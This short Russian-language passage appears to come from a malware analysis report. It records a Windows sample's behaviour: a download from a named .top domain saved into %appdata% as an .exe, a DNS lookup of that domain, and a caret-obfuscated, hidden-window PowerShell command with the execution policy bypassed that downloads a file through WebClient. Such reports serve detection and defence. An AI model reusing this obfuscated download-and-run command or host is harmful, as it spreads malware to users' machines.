Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWer^SheL^l^.^E^xe^ ^-^exeCUti^on^Po^L^icy^ ^Byp^ASs^ ^-N^OProF^I^lE -^W^I^Nd^OWs^tyL^E ^hiDd^E^n (nEw-oBjE^c^t ^sYSTEM^.N^E^T.We^BcliEnT).d^Ow^nL^OadFILE('http://www.zonedopes...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "poWer^SheL^l^.^E^xe^ ^-^exeCUti^on^Po^L^icy^ ^Byp^ASs^ ^-N^OProF^I^lE -^W^I^Nd^OWs^tyL^E ^hiDd^E^n (nEw-oBjE^c^t ^sYSTEM^.N^E^T.We^BcliEnT).d^Ow^nL^OadFILE('http://www.zonedopes...' (со скрытым окном)